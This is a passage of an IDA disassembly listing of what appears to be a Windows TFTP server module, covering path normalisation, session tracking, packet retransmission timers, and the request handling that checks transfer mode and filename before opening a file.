jz short loc_10026CB
mov byte ptr [esi], 5Ch
inc esi
loc_10026CB: ; CODE XREF: sub_100261E+9C�j
; sub_100261E+A3�j ...
inc ecx
jz short loc_10026D8
mov al, [ecx]
cmp al, 5Ch
jz short loc_10026CB
cmp al, 2Fh
jz short loc_10026CB
loc_10026D8: ; CODE XREF: sub_100261E+AE�j
mov [ebp+arg_0], esi
jmp loc_1002642
; ---------------------------------------------------------------------------
loc_10026E0: ; CODE XREF: sub_100261E+6C�j
xor eax, eax
jmp short loc_10026FC
; ---------------------------------------------------------------------------
loc_10026E4: ; CODE XREF: sub_100261E+28�j
mov cl, [esi-1]
lea eax, [esi-1]
cmp cl, 5Ch
jz short loc_10026F4
cmp cl, 2Fh
jnz short loc_10026F6
loc_10026F4: ; CODE XREF: sub_100261E+CF�j
mov esi, eax
loc_10026F6: ; CODE XREF: sub_100261E+D4�j
and byte ptr [esi], 0
push 1
pop eax
loc_10026FC: ; CODE XREF: sub_100261E+C4�j
pop edi
pop esi
pop ebx
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_1002703: ; CODE XREF: sub_100261E+50�j
; sub_100261E+64�j ...
mov [esi], al
mov al, [ecx+1]
inc esi
inc ecx
test al, al
jz short loc_100269C
cmp al, 5Ch
jz short loc_100269C
cmp al, 2Fh
jnz short loc_1002703
jmp short loc_100269C
; ---------------------------------------------------------------------------
loc_1002718: ; CODE XREF: sub_100261E+3F�j
; sub_100261E+48�j
mov ecx, edi
jmp short loc_100269C
; ---------------------------------------------------------------------------
loc_100271C: ; CODE XREF: sub_100261E+30�j
; sub_100261E+11D�j
test al, al
jz loc_100269C
cmp al, 5Ch
jz loc_100269C
cmp al, 2Fh
jz loc_100269C
mov [esi], al
mov al, [ecx+1]
inc esi
inc ecx
jmp short loc_100271C
sub_100261E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100273D proc near ; CODE XREF: sub_1002F31+18C�p
; sub_100333A+197�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
mov edx, [ebp+arg_0]
repne scasb
not ecx
dec ecx
mov edi, edx
mov ebx, ecx
or ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
cmp byte ptr [ebx+esi-1], 5Ch
mov edi, ecx
setz al
xor ecx, ecx
cmp byte ptr [edx], 5Ch
setz cl
test eax, eax
jnz short loc_1002784
test ecx, ecx
jnz short loc_1002784
mov [ebp+arg_8], 1
jmp short loc_1002791
; ---------------------------------------------------------------------------
loc_1002784: ; CODE XREF: sub_100273D+38�j
; sub_100273D+3C�j
and [ebp+arg_8], 0
test eax, eax
jz short loc_1002791
test ecx, ecx
jz short loc_1002791
dec ebx
loc_1002791: ; CODE XREF: sub_100273D+45�j
; sub_100273D+4D�j ...
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
add eax, edi
add eax, ebx
dec ecx
cmp eax, ecx
jbe short loc_10027A4
xor eax, eax
jmp short loc_10027DA
; ---------------------------------------------------------------------------
loc_10027A4: ; CODE XREF: sub_100273D+61�j
mov eax, [ebp+arg_8]
inc edi
add eax, ebx
push edi
add eax, edx
push edx
push eax
call dword_1001144 ; memmove
mov eax, [ebp+arg_0]
mov ecx, ebx
mov edx, ecx
mov edi, eax
shr ecx, 2
rep movsd
mov ecx, edx
add esp, 0Ch
and ecx, 3
cmp [ebp+arg_8], 0
rep movsb
jz short loc_10027D7
mov byte ptr [ebx+eax], 5Ch
loc_10027D7: ; CODE XREF: sub_100273D+94�j
push 1
pop eax
loc_10027DA: ; CODE XREF: sub_100273D+65�j
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_100273D endp
; =============== S U B R O U T I N E =======================================
sub_10027E1 proc near ; CODE XREF: sub_1002B5E+C7�p
; sub_1002F31+36B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov ecx, [esi+10024h]
lea eax, [esi+10024h]
test ecx, ecx
jz short loc_1002817
and dword ptr [eax], 0
mov eax, [esp+8+arg_4]
and word ptr [esi+10014h], 0
mov [esi+10020h], ecx
mov eax, [eax+20h]
mov [esi+1001Ch], eax
jmp short loc_1002877
; ---------------------------------------------------------------------------
loc_1002817: ; CODE XREF: sub_10027E1+14�j
mov edi, dword_1001104
push 3
call edi ; dword_1001104
mov [esi+38h], ax
mov ax, [esi+10014h]
push eax
call edi ; dword_1001104
mov [esi+3Ah], ax
mov eax, [esp+8+arg_4]
push dword ptr [eax+20h]
lea eax, [esi+3Ch]
push eax
push dword ptr [esi+1002Ch]
call dword_1001090 ; _read
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [esi+1001Ch], eax
jnz short loc_100286E
mov esi, dword_10010AC
call esi ; dword_10010AC
call esi ; dword_10010AC
push dword ptr [eax]
call dword_100102C ; RtlSetLastWin32Error
xor eax, eax
jmp short loc_100287A
; ---------------------------------------------------------------------------
loc_100286E: ; CODE XREF: sub_10027E1+75�j
add eax, 4
mov [esi+10020h], eax
loc_1002877: ; CODE XREF: sub_10027E1+34�j
push 1
pop eax
loc_100287A: ; CODE XREF: sub_10027E1+8B�j
pop edi
pop esi
retn 8
sub_10027E1 endp
; =============== S U B R O U T I N E =======================================
sub_100287F proc near ; CODE XREF: sub_1002F31+2C6�p
; sub_100333A+2CD�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_1006080
push esi
call dword_1001058 ; RtlEnterCriticalSection
mov ecx, dword_1006098
push esi
mov eax, [esp+8+arg_0]
mov [eax], ecx
mov dword ptr [eax+4], offset dword_1006098
mov [ecx+4], eax
mov dword_1006098, eax
call dword_100104C ; RtlLeaveCriticalSection
push 1
pop eax
pop esi
retn 4
sub_100287F endp
; =============== S U B R O U T I N E =======================================
sub_10028B5 proc near ; CODE XREF: sub_1002A3D+C�p
; sub_1002EC8+8�p ...
arg_0 = dword ptr 4
push ebx
mov ebx, dword_1001058
push esi
push edi
mov edi, offset dword_1006080
push edi
call ebx ; dword_1001058
mov eax, dword_1006098
mov ecx, offset dword_1006098
loc_10028D0: ; CODE XREF: sub_10028B5+2D�j
cmp eax, ecx
jz short loc_10028F2
mov edx, [eax+8]
lea esi, [eax-18h]
cmp edx, [esp+0Ch+arg_0]
jz short loc_10028E4
mov eax, [eax]
jmp short loc_10028D0
; ---------------------------------------------------------------------------
loc_10028E4: ; CODE XREF: sub_10028B5+29�j
push esi
call ebx ; dword_1001058
push edi
call dword_100104C ; RtlLeaveCriticalSection
mov eax, esi
jmp short loc_10028FB
; ---------------------------------------------------------------------------
loc_10028F2: ; CODE XREF: sub_10028B5+1D�j
push edi
call dword_100104C ; RtlLeaveCriticalSection
xor eax, eax
loc_10028FB: ; CODE XREF: sub_10028B5+3B�j
pop edi
pop esi
pop ebx
retn 4
sub_10028B5 endp
; =============== S U B R O U T I N E =======================================
sub_1002901 proc near ; CODE XREF: sub_100297A+A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+20h]
cmp eax, 0FFFFFFFFh
jz short loc_1002915
push eax
call dword_100111C ; closesocket
loc_1002915: ; CODE XREF: sub_1002901+B�j
mov eax, [esi+10004h]
test eax, eax
jz short loc_100292E
push 0
push eax
push dword_10060A0
call dword_1001158 ; RtlDeleteTimer
loc_100292E: ; CODE XREF: sub_1002901+1C�j
push 0
push dword ptr [esi+0FFFCh]
call dword_1001168 ; RtlDeregisterWaitEx
push dword ptr [esi+0FFF8h]
call dword_1001054 ; CloseHandle
push esi
call dword_1001028 ; RtlDeleteCriticalSection
pop esi
retn 4
sub_1002901 endp
; =============== S U B R O U T I N E =======================================
sub_1002953 proc near ; CODE XREF: sub_100297A+2F�p
; sub_100297A+37�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+1002Ch]
cmp eax, 0FFFFFFFFh
jz short loc_100296B
push eax
call dword_100108C ; _close
pop ecx
loc_100296B: ; CODE XREF: sub_1002953+E�j
push esi
call dword_10010A0 ; free
pop ecx
pop esi
retn 4
sub_1002953 endp
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_100297A proc near ; CODE XREF: sub_10029BA+55�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_10029B6
push esi
call sub_1002901
mov eax, [esi+24h]
dec eax
jz short loc_10029B0
dec eax
jz short loc_10029A8
dec eax
jz short loc_10029A0
dec eax
jnz short loc_10029B6
push esi
call nullsub_1
jmp short loc_10029B6
; ---------------------------------------------------------------------------
loc_10029A0: ; CODE XREF: sub_100297A+19�j
push esi
call nullsub_1
jmp short loc_10029B6
; ---------------------------------------------------------------------------
loc_10029A8: ; CODE XREF: sub_100297A+16�j
push esi
call sub_1002953
jmp short loc_10029B6
; ---------------------------------------------------------------------------
loc_10029B0: ; CODE XREF: sub_100297A+13�j
push esi
call sub_1002953
loc_10029B6: ; CODE XREF: sub_100297A+7�j
; sub_100297A+1C�j ...
pop esi
retn 4
sub_100297A endp
; =============== S U B R O U T I N E =======================================
sub_10029BA proc near ; DATA XREF: sub_10018DB+98�o
push ebx
mov ebx, dword_1001058
push esi
push offset dword_1006080
call ebx ; dword_1001058
mov esi, dword_1006098
cmp esi, offset dword_1006098
jz short loc_1002A28
push edi
push ebp
loc_10029D9: ; CODE XREF: sub_10029BA+6A�j
lea edi, [esi-18h]
push edi
call ebx ; dword_1001058
mov ebp, [esi]
inc dword ptr [edi+10008h]
cmp dword ptr [edi+10008h], 4
lea eax, [edi+10008h]
push edi
jb short loc_1002A16
call ebx ; dword_1001058
mov eax, [esi]
mov esi, [esi+4]
mov [esi], eax
mov [eax+4], esi
mov ax, [edi+2Ah]
push eax
call dword_1001104 ; ntohs
push edi
call sub_100297A
jmp short loc_1002A1C
; ---------------------------------------------------------------------------
loc_1002A16: ; CODE XREF: sub_10029BA+3B�j
call dword_100104C ; RtlLeaveCriticalSection
loc_1002A1C: ; CODE XREF: sub_10029BA+5A�j
cmp ebp, offset dword_1006098
mov esi, ebp
jnz short loc_10029D9
pop ebp
pop edi
loc_1002A28: ; CODE XREF: sub_10029BA+1B�j
push offset dword_1006080
call dword_100104C ; RtlLeaveCriticalSection
call sub_1001A1F
pop esi
pop ebx
retn 8
sub_10029BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002A3D proc near ; DATA XREF: sub_1002F31+341�o
; sub_100333A+32C�o
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_10028B5
mov esi, eax
xor ebx, ebx
cmp esi, ebx
jz loc_1002B57
mov eax, [esi+1000Ch]
cmp eax, 0Ah
jnb loc_1002B0B
cmp eax, 5
jbe short loc_1002A8E
lea eax, [ebp+var_10]
push eax
call dword_1001024 ; GetLocalTime
mov ax, [esi+2Ah]
push eax
call dword_100110C ; ntohs
mov ax, [esi+3Ah]
push eax
call dword_1001104 ; ntohs
loc_1002A8E: ; CODE XREF: sub_1002A3D+2F�j
lea eax, [esi+28h]
push 10h
push eax
push ebx
push dword ptr [esi+10020h]
lea eax, [esi+38h]
push eax
push dword ptr [esi+20h]
call dword_1001130 ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_1002AB3
call dword_10010F8 ; WSAGetLastError
loc_1002AB3: ; CODE XREF: sub_1002A3D+6E�j
mov edi, [esi+10004h]
inc dword ptr [esi+1000Ch]
cmp edi, ebx
jz loc_1002B4C
cmp [esi+10028h], ebx
jnz short loc_1002AEA
mov eax, [esi+10000h]
lea ecx, [esi+10000h]
shl eax, 1
mov edx, 2710h
mov [ecx], eax
cmp eax, edx
jbe short loc_1002AEA
mov [ecx], edx
loc_1002AEA: ; CODE XREF: sub_1002A3D+90�j
; sub_1002A3D+A9�j
mov eax, [esi+10000h]
push eax
push eax
push edi
push dword_10060A0
call dword_1001154 ; RtlUpdateTimer
cmp eax, ebx
jz short loc_1002B4C
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_1002B4C
; ---------------------------------------------------------------------------
loc_1002B0B: ; CODE XREF: sub_1002A3D+26�j
cmp esi, ebx
jz short loc_1002B57
push offset aTimeout ; "Timeout"
push ebx
push dword ptr [esi+20h]
lea eax, [esi+28h]
push ebx
push eax
call sub_100230A
mov eax, [esi+10004h]
lea edi, [esi+10004h]
cmp eax, ebx
jz short loc_1002B40
push ebx
push eax
push dword_10060A0
call dword_1001158 ; RtlDeleteTimer
loc_1002B40: ; CODE XREF: sub_1002A3D+F3�j
mov [edi], ebx
mov dword ptr [esi+10008h], 4
loc_1002B4C: ; CODE XREF: sub_1002A3D+84�j
; sub_1002A3D+C4�j ...
cmp esi, ebx
jz short loc_1002B57
push esi
call dword_100104C ; RtlLeaveCriticalSection
loc_1002B57: ; CODE XREF: sub_1002A3D+17�j
; sub_1002A3D+D0�j ...
pop edi
pop esi
pop ebx
leave
retn 8
sub_1002A3D endp
; =============== S U B R O U T I N E =======================================
sub_1002B5E proc near ; CODE XREF: sub_1002EC8+3D�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
push ebx
mov ebx, dword_100110C
push ebp
push esi
mov esi, [esp+10h+arg_0]
push edi
mov edi, [esp+14h+arg_4]
xor ebp, ebp
mov eax, [esi+10018h]
push 4
mov [esp+18h+var_4], ebp
mov [edi+20h], eax
call ebx ; dword_100110C
cmp [edi+34h], ax
jnz short loc_1002BA6
mov ax, [esi+10014h]
push eax
call ebx ; dword_100110C
cmp [edi+36h], ax
jnz short loc_1002BA6
and dword ptr [esi+1000Ch], 0
push 1
pop ebp
jmp short loc_1002BCE
; ---------------------------------------------------------------------------
loc_1002BA6: ; CODE XREF: sub_1002B5E+2A�j
; sub_1002B5E+3A�j
mov ax, [edi+36h]
push eax
call ebx ; dword_100110C
mov ax, [edi+34h]
push eax
call dword_1001104 ; ntohs
push 4
call ebx ; dword_100110C
cmp [edi+34h], ax
jnz short loc_1002BCE
mov ax, [esi+10014h]
dec ax
push eax
call ebx ; dword_100110C
loc_1002BCE: ; CODE XREF: sub_1002B5E+46�j
; sub_1002B5E+62�j
test ebp, ebp
jz loc_1002C96
cmp dword ptr [esi+10030h], 0
jz short loc_1002C1C
mov eax, [esi+10004h]
lea edi, [esi+10004h]
test eax, eax
jz short loc_1002BFE
push 0
push eax
push dword_10060A0
call dword_1001158 ; RtlDeleteTimer
loc_1002BFE: ; CODE XREF: sub_1002B5E+8F�j
and dword ptr [edi], 0
mov dword ptr [esi+10008h], 4
loc_1002C0B: ; CODE XREF: sub_1002B5E+DB�j
; sub_1002B5E+13E�j ...
push esi
call dword_100104C ; RtlLeaveCriticalSection
xor eax, eax
loc_1002C14: ; CODE XREF: sub_1002B5E+183�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn 8
; ---------------------------------------------------------------------------
loc_1002C1C: ; CODE XREF: sub_1002B5E+7F�j
inc word ptr [esi+10014h]
push edi
push esi
call sub_10027E1
mov ebp, eax
xor eax, eax
cmp ebp, eax
jnz short loc_1002C3B
mov ax, [edi+0Eh]
push eax
call ebx ; dword_100110C
jmp short loc_1002C0B
; ---------------------------------------------------------------------------
loc_1002C3B: ; CODE XREF: sub_1002B5E+D2�j
cmp [esi+10028h], eax
mov [esi+1000Ch], eax
mov [esi+10008h], eax
jnz short loc_1002C59
mov dword ptr [esi+10000h], 3E8h
loc_1002C59: ; CODE XREF: sub_1002B5E+EF�j
mov ecx, [esi+10004h]
cmp ecx, eax
jz short loc_1002C78
mov eax, [esi+10000h]
push eax
push eax
push ecx
push dword_10060A0
call dword_1001154 ; RtlUpdateTimer
loc_1002C78: ; CODE XREF: sub_1002B5E+103�j
mov eax, [esi+1001Ch]
cmp eax, [edi+20h]
jnb short loc_1002C9A
mov ax, [edi+0Eh]
push eax
call ebx ; dword_100110C
mov dword ptr [esi+10030h], 1
jmp short loc_1002C9A
; ---------------------------------------------------------------------------
loc_1002C96: ; CODE XREF: sub_1002B5E+72�j
mov ebp, [esp+14h+var_4]
loc_1002C9A: ; CODE XREF: sub_1002B5E+123�j
; sub_1002B5E+136�j
test ebp, ebp
jz loc_1002C0B
mov ax, [edi+0Eh]
push eax
call ebx ; dword_100110C
add edi, 0Ch
push 10h
push edi
push 0
push dword ptr [esi+10020h]
lea eax, [esi+38h]
push eax
push dword ptr [esi+20h]
call dword_1001130 ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_1002C0B
call dword_10010F8 ; WSAGetLastError
test esi, esi
jz short loc_1002CDE
push esi
call dword_100104C ; RtlLeaveCriticalSection
loc_1002CDE: ; CODE XREF: sub_1002B5E+177�j
push 1
pop eax
jmp loc_1002C14
sub_1002B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002CE6 proc near ; CODE XREF: sub_1002EC8+34�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, dword_100110C
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
push 3
mov eax, [esi+10018h]
mov [edi+20h], eax
call ebx ; dword_100110C
cmp [edi+34h], ax
jnz short loc_1002D3A
mov ax, [esi+10014h]
inc ax
push eax
call ebx ; dword_100110C
cmp [edi+36h], ax
jnz short loc_1002D3A
inc word ptr [esi+10014h]
xor ebx, ebx
mov [ebp+var_4], 1
mov [esi+10008h], ebx
jmp short loc_1002D9D
; ---------------------------------------------------------------------------
loc_1002D3A: ; CODE XREF: sub_1002CE6+28�j
; sub_1002CE6+3A�j
push 3
call ebx ; dword_100110C
cmp [edi+34h], ax
jnz short loc_1002D9B
mov ax, [esi+10014h]
push eax
call ebx ; dword_100110C
cmp [edi+36h], ax
jnz short loc_1002D9B
mov ebx, dword_1001104
push 4
call ebx ; dword_1001104
mov [esi+38h], ax
mov ax, [esi+10014h]
push eax
call ebx ; dword_1001104
add edi, 0Ch
push 10h
mov [esi+3Ah], ax
push edi
push 0
lea eax, [esi+38h]
push 4
push eax
push dword ptr [esi+20h]
call dword_1001130 ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_1002EB3
call dword_10010F8 ; WSAGetLastError
jmp loc_1002EB3
; ---------------------------------------------------------------------------
loc_1002D9B: ; CODE XREF: sub_1002CE6+5C�j
; sub_1002CE6+6C�j
xor ebx, ebx
loc_1002D9D: ; CODE XREF: sub_1002CE6+52�j
cmp [ebp+var_4], ebx
jz short loc_1002DE4
lea eax, [ebp+arg_4]
push eax
mov eax, [edi+2Ch]
push dword ptr [esi+10030h]
sub eax, 4
push eax
lea eax, [edi+38h]
push eax
push dword ptr [esi+1002Ch]
call sub_100373A
cmp [ebp+var_4], ebx
mov [ebp+arg_0], eax
jz short loc_1002DE4
cmp eax, ebx
jge short loc_1002DF7
push ebx
push 3
push dword ptr [edi+8]
lea eax, [edi+0FFF1h]
add edi, 0Ch
push eax
push edi
call sub_100230A
loc_1002DE4: ; CODE XREF: sub_1002CE6+BA�j
; sub_1002CE6+E2�j
cmp esi, ebx
jz short loc_1002DEF
push esi
call dword_100104C ; RtlLeaveCriticalSection
loc_1002DEF: ; CODE XREF: sub_1002CE6+100�j
push 1
pop eax
jmp loc_1002EBC
; ---------------------------------------------------------------------------
loc_1002DF7: ; CODE XREF: sub_1002CE6+E6�j
mov eax, [edi+2Ch]
sub eax, 4
cmp eax, [edi+20h]
ja loc_1002EB3
mov ebx, dword_1001104
push 4
call ebx ; dword_1001104
mov [esi+38h], ax
mov ax, [esi+10014h]
push eax
call ebx ; dword_1001104
mov [esi+3Ah], ax
lea eax, [edi+0Ch]
push 10h
xor ebx, ebx
push eax
push ebx
lea eax, [esi+38h]
push 4
push eax
push dword ptr [esi+20h]
call dword_1001130 ; sendto
mov [ebp+arg_0], eax
mov eax, [esi+10004h]
cmp eax, ebx
jz short loc_1002E74
cmp [esi+10028h], ebx
mov [esi+1000Ch], ebx
jnz short loc_1002E5F
mov dword ptr [esi+10000h], 3E8h
loc_1002E5F: ; CODE XREF: sub_1002CE6+16D�j
mov ecx, [esi+10000h]
push ecx
push ecx
push eax
push dword_10060A0
call dword_1001154 ; RtlUpdateTimer
loc_1002E74: ; CODE XREF: sub_1002CE6+15F�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_1002E80
call dword_10010F8 ; WSAGetLastError
loc_1002E80: ; CODE XREF: sub_1002CE6+192�j
mov eax, [edi+2Ch]
sub eax, 4
cmp eax, [edi+20h]
jnb short loc_1002EB3
mov eax, [esi+10004h]
cmp eax, ebx
jz short loc_1002EA3
push ebx
push eax
push dword_10060A0
call dword_1001158 ; RtlDeleteTimer
loc_1002EA3: ; CODE XREF: sub_1002CE6+1AD�j
mov [esi+10004h], ebx
mov dword ptr [esi+10008h], 4
loc_1002EB3: ; CODE XREF: sub_1002CE6+A4�j
; sub_1002CE6+B0�j ...
push esi
call dword_100104C ; RtlLeaveCriticalSection
xor eax, eax
loc_1002EBC: ; CODE XREF: sub_1002CE6+10C�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_1002CE6 endp
; =============== S U B R O U T I N E =======================================
sub_1002EC3 proc near ; CODE XREF: sub_1002EC8+22�p
; sub_1002EC8+2B�p
xor eax, eax
retn 8
sub_1002EC3 endp
; =============== S U B R O U T I N E =======================================
sub_1002EC8 proc near ; CODE XREF: sub_1001A91+254�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+8]
call sub_10028B5
test eax, eax
jz short loc_1002F0A
mov ecx, [eax+24h]
dec ecx
jz short loc_1002F03
dec ecx
jz short loc_1002EFA
dec ecx
jz short loc_1002EF1
dec ecx
jnz short loc_1002F0A
push esi
push eax
call sub_1002EC3
jmp short loc_1002F0A
; ---------------------------------------------------------------------------
loc_1002EF1: ; CODE XREF: sub_1002EC8+1B�j
push esi
push eax
call sub_1002EC3
jmp short loc_1002F0A
; ---------------------------------------------------------------------------
loc_1002EFA: ; CODE XREF: sub_1002EC8+18�j
push esi
push eax
call sub_1002CE6
jmp short loc_1002F0A
; ---------------------------------------------------------------------------
loc_1002F03: ; CODE XREF: sub_1002EC8+15�j
push esi
push eax
call sub_1002B5E
loc_1002F0A: ; CODE XREF: sub_1002EC8+F�j
; sub_1002EC8+1E�j ...
pop esi
retn 4
sub_1002EC8 endp
; =============== S U B R O U T I N E =======================================
sub_1002F0E proc near ; CODE XREF: sub_1002F31+20�p
; sub_100333A+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
cmp [esp+arg_4], eax
jbe short loc_1002F27
loc_1002F16: ; CODE XREF: sub_1002F0E+17�j
mov ecx, [esp+arg_0]
cmp byte ptr [eax+ecx], 0
jz short loc_1002F2C
inc eax
cmp eax, [esp+arg_4]
jb short loc_1002F16
loc_1002F27: ; CODE XREF: sub_1002F0E+6�j
xor eax, eax
locret_1002F29: ; CODE XREF: sub_1002F0E+21�j
retn 8
; ---------------------------------------------------------------------------
loc_1002F2C: ; CODE XREF: sub_1002F0E+10�j
push 1
pop eax
jmp short locret_1002F29
sub_1002F0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002F31 proc near ; CODE XREF: sub_1001A91+223�p
; DATA XREF: sub_1001A91+1FC�o
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
and [ebp+var_10], 0
and [ebp+var_14], 0
push esi
mov esi, [ebp+arg_0]
push edi
push 0FFBAh
lea ebx, [esi+36h]
push ebx
mov [ebp+var_18], ebx
call sub_1002F0E
test eax, eax
jz loc_100330F
mov edi, ebx
or ecx, 0FFFFFFFFh
xor eax, eax
push 10034h
repne scasb
not ecx
dec ecx
lea eax, [ecx+ebx+1]
mov [ebp+var_4], eax
call dword_1001094 ; malloc
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_1003331
mov ecx, 400Dh
xor eax, eax
mov edi, ebx
rep stosd
push dword ptr [esi+10h]
call dword_1001120 ; inet_ntoa
mov [ebp+var_8], eax
mov ax, [esi+0Eh]
push eax
call dword_1001104 ; ntohs
mov edi, [ebp+var_4]
mov [ebp+var_C], edi
mov al, [edi]
test al, al
jz short loc_1002FCD
loc_1002FB5: ; CODE XREF: sub_1002F31+97�j
movsx eax, al
push eax
call dword_1001150 ; tolower
mov [edi], al
mov al, [edi+1]
inc edi
pop ecx
test al, al
jnz short loc_1002FB5
mov [ebp+var_C], edi
loc_1002FCD: ; CODE XREF: sub_1002F31+82�j
mov edi, [ebp+var_4]
mov eax, offset aNetascii ; "netascii"
loc_1002FD5: ; CODE XREF: sub_1002F31+C0�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_1002FF7
test cl, cl
jz short loc_1002FF3
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_1002FF7
inc edi
inc edi
inc eax
inc eax
test cl, cl
jnz short loc_1002FD5
loc_1002FF3: ; CODE XREF: sub_1002F31+AE�j
xor eax, eax
jmp short loc_1002FFC
; ---------------------------------------------------------------------------
loc_1002FF7: ; CODE XREF: sub_1002F31+AA�j
; sub_1002F31+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_1002FFC: ; CODE XREF: sub_1002F31+C4�j
test eax, eax
jz short loc_1003037
mov edi, [ebp+var_4]
mov eax, offset aOctet ; "octet"
loc_1003008: ; CODE XREF: sub_1002F31+F3�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_100302A
test cl, cl
jz short loc_1003026
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_100302A
inc edi
inc edi
inc eax
inc eax
test cl, cl
jnz short loc_1003008
loc_1003026: ; CODE XREF: sub_1002F31+E1�j
xor eax, eax
jmp short loc_100302F
; ---------------------------------------------------------------------------
loc_100302A: ; CODE XREF: sub_1002F31+DD�j
; sub_1002F31+EB�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_100302F: ; CODE XREF: sub_1002F31+F7�j
test eax, eax
jnz loc_10032F6
loc_1003037: ; CODE XREF: sub_1002F31+CD�j
mov edi, [ebp+var_18]
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [esi+1FFADh]
repne scasb
not ecx
sub edi, ecx
push edx
mov eax, ecx
mov esi, edi
mov edi, edx
mov [ebp+var_4], edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_100261E
test eax, eax
jnz short loc_1003071
push offset aMalformedFileN ; "Malformed file name"
jmp short loc_10030CB
; ---------------------------------------------------------------------------
loc_1003071: ; CODE XREF: sub_1002F31+137�j
push [ebp+var_8]
push offset dword_1005CE8
call sub_10039D6
test eax, eax
jnz short loc_1003093
push [ebp+var_8]
push offset dword_1005D20
call sub_10039D6
test eax, eax
jz short loc_10030A4
loc_1003093: ; CODE XREF: sub_1002F31+14F�j
push [ebp+var_4]
push offset dword_1005D58
call sub_10039D6
test eax, eax
jnz short loc_10030B0
loc_10030A4: ; CODE XREF: sub_1002F31+160�j
call dword_10010AC ; _errno
push 0
push 2
jmp short loc_1003100
; ---------------------------------------------------------------------------
loc_10030B0: ; CODE XREF: sub_1002F31+171�j
push (offset dword_1005E07+1)
push 0FFBCh
push [ebp+var_4]
call sub_100273D
test eax, eax
jnz short loc_10030CF
push offset aFileNameTooLon ; "File name too long"
loc_10030CB: ; CODE XREF: sub_1002F31+13E�j
push 0
jmp short loc_1003100
; ---------------------------------------------------------------------------
loc_10030CF: ; CODE XREF: sub_1002F31+193�j
push 8000h
push [ebp+var_4]
call dword_10010E4 ; _open
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebx+1002Ch], eax
jnz short loc_1003116
mov esi, dword_10010AC
call esi ; dword_10010AC
push dword ptr [eax]
call dword_100102C ; RtlSetLastWin32Error
call esi ; dword_10010AC
push 0
push 1
loc_1003100: ; CODE XREF: sub_1002F31+17D�j
; sub_1002F31+19C�j
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
lea ecx, [eax+0FFF1h]
add eax, 0Ch
push ecx
push eax
jmp loc_1003308
; ---------------------------------------------------------------------------
loc_1003116: ; CODE XREF: sub_1002F31+1B7�j
mov edi, dword_1001088
push 2
push 0
push eax
call edi ; dword_1001088
mov esi, [ebp+arg_0]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_1003140
push 0
push 0
mov [esi+24h], eax
push dword ptr [ebx+1002Ch]
call edi ; dword_1001088
add esp, 0Ch
loc_1003140: ; CODE XREF: sub_1002F31+1FB�j
cmp eax, 0FFFFFFFFh
jnz short loc_1003159
mov edi, dword_10010AC
call edi ; dword_10010AC
call edi ; dword_10010AC
push dword ptr [eax]
call dword_100102C ; RtlSetLastWin32Error
jmp short loc_1003197
; ---------------------------------------------------------------------------
loc_1003159: ; CODE XREF: sub_1002F31+212�j
push 0
push 2
push 2
call dword_100112C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz short loc_1003191
mov eax, [esi+1Ch]
and [ebp+var_26], 0
mov [ebp+var_24], eax
lea eax, [ebp+var_28]
push 10h
push eax
push edi
